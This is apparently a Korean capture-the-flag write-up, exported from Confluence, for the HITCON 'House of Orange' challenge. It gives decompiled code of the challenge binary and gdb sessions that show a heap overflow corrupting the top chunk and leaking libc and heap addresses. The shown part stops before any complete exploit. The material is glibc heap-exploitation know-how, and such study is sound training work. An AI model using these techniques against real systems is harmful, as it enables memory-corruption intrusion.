Date: Thu, 28 Mar 2024 10:18:20 +0000 (UTC) Message-ID: <1633706672.937.1711621100848@instance-2.us-central1-a.c.lazenca.internal> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_936_1082029434.1711621100847" ------=_Part_936_1082029434.1711621100847 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: file:///C:/exported.html
<= /p>
E= xcuse the ads! We need some help to keep our site up.
My teammate, Orange, need a house. Can you build it ?
nc 52.68.192.99 56746
hourseoforange
libc.so.6
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ file ./houseoforange_22785bece84189e6= 32567da38e4be0e0c4bb1682=20 ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682: ELF 64-bit LSB s= hared object, x86-64, version 1 (SYSV), dynamically linked (uses shared lib= s), for GNU/Linux 2.6.32, BuildID[sha1]=3Da58bda41b65d38949498561b0f2b976ce= 5c0c301, stripped autolycos@ubuntu:~/CTF/HITCON/houseoforange$ checksec.sh --file ./houseofor= ange_22785bece84189e632567da38e4be0e0c4bb1682=20 RELRO STACK CANARY NX PIE RPATH = RUNPATH FILE Full RELRO Canary found NX enabled PIE enabled No RPATH = No RUNPATH ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682 autolycos@ubuntu:~/CTF/HITCON/houseoforange$
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ ./houseoforange_22785bece84189e632567= da38e4be0e0c4bb1682=20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
Your ch= oice : 1 Length of name :10 Name :AAAAAAAAAA Price of Orange:+++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish
Your ch= oice : 2 Name of house : AAAAAAAAAA Price of orange : 0 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . . . . . . . \ =20 |. =CF=89=CF=89=CF=89=CF=89 . .=CF=89=CF=89=CF=89=CF=89. | =20 \ . $$. . . $$. ..| =20 \. . . . . . . . ./ =20 \ . . . O . . . / =20 '-.__.__.__._-'
Your ch= oice : 3 Length of name :20 Name:BBBBBBBBBBBBBBBBBBBB Price of Orange: +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 2 Finish
void __f= astcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int menuNumber; // eax@2 setSIGALE(); while ( 1 ) { while ( 1 ) { PrintMenu(); menuNumber =3D UserInput(); if ( menuNumber !=3D 2 ) break; SeeTheHouse(); } if ( menuNumber > 2 ) { if ( menuNumber =3D=3D 3 ) { UpgradeTheHouse(); } else { if ( menuNumber =3D=3D 4 ) { puts("give up"); exit(0); } LABEL_14: puts("Invalid choice"); } } else { if ( menuNumber !=3D 1 ) goto LABEL_14; BuildTheHouse(); } } }
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gHouseCount=EC=9D=98 =EA= =B0=92=EC=9D=B4 3=EB=B3=B4=EB=8B=A4 =ED=81=B0 =EA=B0=92=EC=9D=B8=EC=A7=80 = =ED=99=95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.
=ED=95=B4=EB=8B=B9 =EB=B3=80=EC=88=98=EB=A5=BC =EC=9D=B4=EC=9A=A9=ED= =95=B4 =ED=95=B4=EB=8B=B9 =ED=95=A8=EC=88=98=EB=A5=BC 4=EB=B2=88=EB=A7=8C = =EC=82=AC=EC=9A=A9 =EA=B0=80=EB=8A=A5=ED=95=98=EB=8F=84=EB=A1=9D =ED=95=A9= =EB=8B=88=EB=8B=A4.
HOUSE =EA=B5=AC=EC=A1=B0=EC=B2=B4=EC=9D=98 Heap =EA=B3=B5=EA=B0=84= =EC=9D=84 =ED=95=A0=EB=8B=B9=ED=95=A9=EB=8B=88=EB=8B=A4.
=EC=82=AC=EC=9A=A9=EC=9E=90=EB=A1=9C =EB=B6=80=ED=84=B0 =EC=9E=85=EB= =A0=A5=ED=95=A0 =EC=9D=B4=EB=A6=84=EC=9D=98 =EA=B8=B8=EC=9D=B4=EB=A5=BC =EC= =9E=85=EB=A0=A5=EB=B0=9B=EC=8A=B5=EB=8B=88=EB=8B=A4.
int Buil= dTheHouse() { unsigned int size; // [rsp+8h] [rbp-18h]@4 signed int colorNumber; // [rsp+Ch] [rbp-14h]@9 HOUSE *houseData; // [rsp+10h] [rbp-10h]@4 INFO *info; // [rsp+18h] [rbp-8h]@9 if ( gHouseCount > 3u ) { puts("Too many house"); exit(1); } houseData =3D (house *)malloc(0x10uLL); printf("Length of name :"); size =3D UserInput(); if ( size > 4096 ) size =3D 4096; houseData->name =3D (char *)malloc(size); if ( !houseData->name ) { puts("Malloc error !!!"); exit(1); } printf("Name :"); NameInput(houseData->name, size); info =3D (Info *)calloc(1uLL, 8uLL); printf("Price of Orange:", 8LL); info->price =3D UserInput(); colorPrint(); printf("Color of Orange:"); colorNumber =3D UserInput(); if ( colorNumber !=3D 56746 && (colorNumber <=3D 0 || colorNum= ber > 7) ) { puts("No such color"); exit(1); } if ( colorNumber =3D=3D 56746 ) info->color =3D 56746; else info->color =3D colorNumber + 30; houseData->house =3D info; gHouseDate =3D houseData; ++gHouseCount; return puts("Finish"); }
struct H= OUSE { struct Info *house; char *name; };
struct I= NFO { int price ; int color ; };
"gHouseDate->house->color"=EC=9D=98 =EA=B0=92=EC=9D=84 =ED=99= =95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.
"56746"=EA=B3=BC =EA=B0=99=EB=8B=A4=EB=A9=B4 orange =EC=83=89=EC=9D= =98 orange=EA=B0=80 =EC=B6=9C=EB=A0=A5=EB=90=A9=EB=8B=88=EB=8B=A4.
int SeeT= heHouse() { int v0; // eax@3 int result; // eax@3 int v2; // eax@8 if ( !gHouseDate ) return puts("No such house !"); if ( gHouseDate->house->color =3D=3D 56746 ) { printf("Name of house : %s\n", gHouseDate->name); printf("Price of orange : %d\n", gHouseDate->house->price); v0 =3D rand(); result =3D printf("\x1B[01;38;5;214m%s\x1B[0m\n", gOrangeImageArr[v0 % = 8]); } else { if ( gHouseDate->house->color <=3D 30 || gHouseDate->house-= >color > 37 ) { puts("Color corruption!"); exit(1); } printf("Name of house : %s\n", gHouseDate->name); printf("Price of orange : %d\n", gHouseDate->house->price); v2 =3D rand(); result =3D printf("\x1B[%dm%s\x1B[0m\n", (unsigned int)gHouseDate->h= ouse->color, gOrangeImageArr[v2 % 8]); } return result; }
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gUpgradeCount=EC=9D=98 =EA=B0= =92=EC=9D=B4 2=EB=B3=B4=EB=8B=A4 =ED=81=B0=EC=A7=80 =ED=99=95=EC=9D=B8=ED= =95=A9=EB=8B=88=EB=8B=A4.
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gHouseDate=EC=97=90 =EB=8D=B0= =EC=9D=B4=ED=84=B0=EA=B0=80 =EC=9E=88=EC=9C=BC=EB=A9=B4 =EC=82=AC=EC=9A=A9= =EC=9E=90=EB=A1=9C =EB=B6=80=ED=84=B0 =EA=B0=92=EC=9D=84 =EC=9E=85=EB=A0=A5= =EB=B0=9B=EC=8A=B5=EB=8B=88=EB=8B=A4.
gUpgradeCount =EB=B3=80=EC=88=98=EC=9D=98 =EA=B0=92=EC=9D=84 =EC=A6= =9D=EA=B0=80 =EC=8B=9C=ED=82=B5=EB=8B=88=EB=8B=A4.
int Upgr= adeTheHouse() { Info *info; // rbx@7 unsigned int size; // [rsp+8h] [rbp-18h]@5 signed int colorNumber; // [rsp+Ch] [rbp-14h]@7 if ( gUpgradeCount > 2u ) return puts("You can't upgrade more"); if ( !gHouseDate ) return puts("No such house !"); printf("Length of name :"); size =3D UserInput(); if ( size > 4096 ) size =3D 4096; printf("Name:"); NameInput(gHouseDate->name, size); printf("Price of Orange: ", size); info =3D gHouseDate->house; info->price =3D UserInput(); colorPrint(); printf("Color of Orange: "); colorNumber =3D UserInput(); if ( colorNumber !=3D 56746 && (colorNumber <=3D 0 || colorNum= ber > 7) ) { puts("No such color"); exit(1); } if ( colorNumber =3D=3D 56746 ) gHouseDate->house->color =3D 56746; else gHouseDate->house->color =3D colorNumber + 30; ++gUpgradeCount; return puts("Finish"); }
0x555555554daa : BuildTheHouse= () =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C "Name" =EA=B0=92=EC=9D=84 =EC=A0=80= =EC=9E=A5=ED=95=A0 Heap=EC=9D=84 =ED=95=A0=EB=8B=B9 =ED=9B=84= p>
0x555555555119 : UpgradeT= heHouse()=ED=95=A8=EC=88=98=EC=97=90=EC=84=9C NameInput() =ED=95=A8=EC= =88=98 =ED=98=B8=EC=B6=9C =EC=A0=84
0x55555555511e : UpgradeTheHouse()=ED=95=A8=EC=88=98=EC=97=
=90=EC=84=9C NameInput() =ED=95=A8=EC=88=98 =ED=98=B8=EC=B6=9C =ED=9B=
=84
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ gdb -q ./houseo* Reading symbols from ./houseoforange_22785bece84189e632567da38e4be0e0c4bb16= 82...(no debugging symbols found)...done. gdb-peda$ b *0x555555554daa Breakpoint 1 at 0x555555554daa gdb-peda$ b *0x555555554dfe Breakpoint 2 at 0x555555554dfe gdb-peda$ b *0x555555554e0d Breakpoint 3 at 0x555555554e0d gdb-peda$ b *0x555555555119 Breakpoint 4 at 0x555555555119 gdb-peda$ b *0x55555555511e Breakpoint 4 at 0x55555555511e gdb-peda$
(gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/autolycos/CTF/HITCON/houseoforange/houseoforange_22= 785bece84189e632567da38e4be0e0c4bb1682=20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :10 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555758030=090x555555758030 gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x0000000000000000=090x0000000000000000 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Name :AAAAAAAAA Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 gdb-peda$ c
0x555555758030 ~ 0x55555575806C = =EC=98=81=EC=97=AD=EC=97=90 =EC=9E=85=EB=A0=A5=ED=95=9C =EB=AC=B8=EC=9E=90= =EC=97=B4=EC=9D=B4 =EC=A0=80=EC=9E=A5=EB=90=98=EC=96=B4 =EC=9E=88=EC=8A=B5= =EB=8B=88=EB=8B=A4.
0x555555758050 =EC=98=81=EC=97=AD=EC=97= =90=EB=8A=94 price,color =EA=B0=92=EC=9D=B4 =EC=A0=80=EC=9E=A5=EB=90=A9=EB= =8B=88=EB=8B=A4.
gdb-ped= a$ c Continuing. Price of Orange:100 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :60 Name: Breakpoint 4, 0x0000555555555119 in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000001f00000064=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 gdb-peda$ ni BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCC Breakpoint 5, 0x000055555555511e in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4242424242424242=090x4242424242424242 0x555555758040:=090x4242424242424242=090x4242424242424242 0x555555758050:=090x4242424242424242=090x4242424242424242 0x555555758060:=090x4343434343424242=090x000000000a434343 gdb-peda$
sysmalloc()=EC=9D=80 =EC=83= =88=EB=A1=9C=EC=9A=B4 =EC=98=81=EC=97=AD=EC=9D=84 =ED=95=A0=EB=8B=B9=ED=95= =98=EA=B8=B0 =EC=9C=84=ED=95=B4=EC=84=9C=EB=8A=94 Top chunk=EC=9D=98 =EA=B0= =92=EC=9D=84 =ED=99=95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.=
Top chunk =EB=B3=80=EC=A1=B0=EB=A5=BC =ED=86=B5=ED=95= =B4 =EC=83=88=EB=A1=9C=EC=9A=B4 =EB=A9=94=EB=AA=A8=EB=A6=AC =EC=98=81=EC=97= =AD=EC=9D=84 =ED=95=A0=EB=8B=B9=EB=B0=9B=EA=B8=B0 =EC=9C=84=ED=95=B4 =EB=8B= =A4=EC=9D=8C=EA=B3=BC =EA=B0=99=EC=9D=80 =EC=A1=B0=EA=B1=B4=EC=9D=84 =EB=A7= =8C=EC=A1=B1=EC=8B=9C=EC=BC=9C=EC=95=BC =ED=95=A9=EB=8B=88=EB=8B=A4.
MINSIZE (0x10)=EB=B3=B4=EB=8B=A4 =EC=BB=A4=EC=95=BC =ED=95=A9=EB=8B= =88=EB=8B=A4. (unsigned long) (old_size) >=3D MINSIZE
need size + MINSIZE =EB=B3=B4=EB=8B=A4 =EC=9E=91=EC=95=84=EC=95=BC = =ED=95=A9=EB=8B=88=EB=8B=A4. (unsigned long) (old_size) < (unsigned long= ) (nb + MINSIZE))
prev_inuse=EA=B0=80 =EC=84=A4=EC=A0=95=EB=90=98=EC=96=B4 =EC=9E=88= =EC=96=B4=EC=95=BC =ED=95=A9=EB=8B=88=EB=8B=A4. prev_inuse (old_top)
old_top +oldsize =ED=8E=98=EC=9D=B4=EC=A7=80=EB=A5=BC =EC=A0=95= =EB=A0=AC=ED=95=B4=EC=95=BC=ED=95=A9=EB=8B=88=EB=8B=A4.
/* If not the first time through, we require old_size to be at least MINSIZE and to have prev_inuse set. */ assert ((old_top =3D=3D initial_top (av) && old_size =3D=3D 0) || ((unsigned long) (old_size) >=3D MINSIZE && prev_inuse= (old_top) && ((unsigned long) old_end & (pagesize - 1)) =3D=3D= 0)); /* Precondition: not enough current space to satisfy nb request */ assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));<= /pre>
0x555555554daa : BuildThe= House() =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C "Name" =EA=B0=92=EC=9D=84 =EC= =A0=80=EC=9E=A5=ED=95=A0 Heap=EC=9D=84 =ED=95=A0=EB=8B=B9 =ED=9B=84
0x555555554e0d : BuildThe= House() =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C calloc() =ED=95=A8=EC=88= =98 =ED=98=B8=EC=B6=9C =ED=9B=84
0x55555555511e : UpgradeTheHouse()=ED=95=A8=EC=88=98=EC=97= =90=EC=84=9C NameInput() =ED=95=A8=EC=88=98 =ED=98=B8=EC=B6=9C =ED=9B= =84
gdb-ped= a$ b *0x555555554000 + 0xDAA Breakpoint 1 at 0x555555554daa gdb-peda$ b *0x555555554000 + 0xDFE Breakpoint 2 at 0x555555554dfe gdb-peda$ b *0x555555554000 + 0xE0D Breakpoint 3 at 0x555555554e0d gdb-peda$ b *0x555555554000 + 0x111E Breakpoint 4 at 0x55555555511e gdb-peda$
gdb-ped= a$ r Starting program: /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange= =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :16 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555758030=090x555555758030 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x0000000000000000=090x0000000000000000 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Program received signal SIGALRM, Alarm clock. Name :AAAAAAAAAAAABB Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x000a424241414141 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x000a424241414141 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
gdb-ped= a$ c Continuing. Price of Orange:100 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :70 Name:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x4141414141414141=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0a42424241414141 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ set *0x555555758068 =3D 0xfa1 gdb-peda$ set *0x55555575806c =3D 0x0 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x4141414141414141=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0000000000000fa1 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
0x55f72a512010 =3D =ED=95=A0=EB=8B= =B9=EB=90=9C heap=EC=9D=98 =EC=8B=9C=EC=9E=91 =EC=A3=BC=EC=86=8C(0x55f= 72a511010) + heap size(0x1000, 4096)
gdb-ped= a$ c Continuing. Price of Orange: 200 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 2 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :4096 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555779010=090x555555779010 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x00000020000000c8=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0000000000000021 0x555555758070:=090x000000000000000a=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000f61 0x555555758090:=090x00007ffff7dd1b78=090x00007ffff7dd1b78 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
"0x5555557580d0", "0x5555557580d8"=EC=98=81=EC=97=AD=EC=97=90 main_a= rena =EC=98=81=EC=97=AD=EC=9D=98 =EC=A3=BC=EC=86=8C=EA=B0=80 =EC=A0=80=EC= =9E=A5=EB=90=98=EC=96=B4 =EC=9E=88=EC=8A=B5=EB=8B=88=EB=8B=A4.
gdb-ped= a$ c Continuing. Name :HEAP Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ c Continuing. Price of Orange:300 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:3 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :1024 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x5555557580d0=090x5555557580d0 gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x00007ffff7dd2188=090x00007ffff7dd2188 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ x/gx 0x00007ffff7dd2188 0x7ffff7dd2188 <main_arena+1640>:=090x00007ffff7dd2178 gdb-peda$
Leak data : ?!???
gdb-ped= a$ c Continuing. Name :LEAKADD Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x0a4444414b41454c=090x00007ffff7dd2188 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ c Continuing. Price of Orange:400 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:4 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 2 Name of house : LEAKADD ?!??? Price of orange : 400 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . \ . . / . . \ =20 |. ____\ . /____. | =20 \ . . . . . . . . | =20 \. . . . . . . . ./ =20 \ . . . =EF=BD=9E . . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
"0x5555557580d0"=EC=9C=BC=EB=A1=9C =EB= =B6=80=ED=84=B0 16 byte =EB=96=A8=EC=96=B4=EC=A7=84=EA=B3=B3=EC=97=90 Heap= =EC=9D=98 =EC=A3=BC=EC=86=8C=EA=B0=80 =EC=A1=B4=EC=9E=AC=ED=95=A9=EB=8B=88= =EB=8B=A4.
=EC=9D=B4=EB=A5=BC Leak=ED=95=98=EA=B8= =B0 =EC=9C=84=ED=95=B4 "Name"=EC=9D=98 =EA=B0=92=EC=9C=BC=EB=A1=9C =EB=AC= =B8=EC=9E=90 15=EB=A5=BC =EC=9E=85=EB=A0=A5=ED=95=A9=EB=8B=88=EB=8B=A4.
=Name of= house : LEAKADD ?!??? Price of orange : 400 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . \ . . / . . \ =20 |. ____\ . /____. | =20 \ . . . . . . . . | =20 \. . . . . . . . ./ =20 \ . . . =EF=BD=9E . . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :1024 Name:BBBBBBBBBBBBBBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x4242424242424242=090x0a42424242424242 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Price of Orange: 500 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 5 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 2 Name of house : BBBBBBBBBBBBBBB ??uUUU Price of orange : 500 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . . . . . . . \ =20 |. =CF=89=CF=89=CF=89=CF=89 . .=CF=89=CF=89=CF=89=CF=89. | =20 \ . $$. . . $$. ..| =20 \. . . . . . . . ./ =20 \ . . . O . . . / =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
=EB=B6=84=EC=84=9D=EC=9D=84 =EC=9C=84=ED=95=B4 "0x555555555119"=EC= =98=81=EC=97=AD=EC=97=90 Break point=EB=A5=BC =EC=84=A4=EC=A0=95=ED=95=A9= =EB=8B=88=EB=8B=A4.
"Length of name" =EC=9D=98 =EC=9E=85=EB=A0=A5 =EA=B0=92=EC=9C=BC=EB= =A1=9C "2048"=EB=A5=BC =EC=A0=84=EB=8B=AC=ED=95=A9=EB=8B=88=EB=8B=A4.
= li>=EC=A4=91=EC=9A=94=ED=95=9C =EB=B6=80=EB=B6=84=EC=9D=80 =ED= =98=84=EC=9E=AC main_arena=EC=9D=98 Unsorted bin=EC=97=90 =EC=A0=80=EC=9E= =A5=EB=90=9C =EC=98=81=EC=97=AD=EC=9E=85=EB=8B=88=EB=8B=A4.
Unsorted bin=EC=98=81=EC=97=AD=EC=97=90 =EC=A0=80=EC=9E=A5=EB=90=9C = =EC=98=81=EC=97=AD=EC=9D=80 0x5555557584f0 =EC=9E=85=EB=8B=88=EB=8B=A4= .
Your ch= oice : 2 Name of house : BBBBBBBBBBBBBBB ??uUUU Price of orange : 500 __ =20 \/.--, =20 //_.' =20 .---//------.. =20 / . . . . . . . \ =20 / . ./\. . ./\ .. \ =20 |. ./ \. ./ \ . | =20 \ . . . . . . . ..| =20 \. . . . . . . . ./ =20 \ . . \___/. . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : ^C Program received signal SIGINT, Interrupt. gdb-peda$ b *0x555555554000 + 0x1119 Breakpoint 5 at 0x555555555119 gdb-peda$ c 3 Length of name :2048 Name: Breakpoint 5, 0x0000555555555119 in ?? () gdb-peda$ i r rdi rdi 0x5555557580d0=090x5555557580d0 gdb-peda$ p main_arena.bins[0] $8 =3D (mchunkptr) 0x5555557584f0 gdb-peda$ p main_arena.bins[1] $9 =3D (mchunkptr) 0x5555557584f0 gdb-peda$ p/d 0x5555557584f0 - 0x5555557580d0 $10 =3D 1056 gdb-peda$ 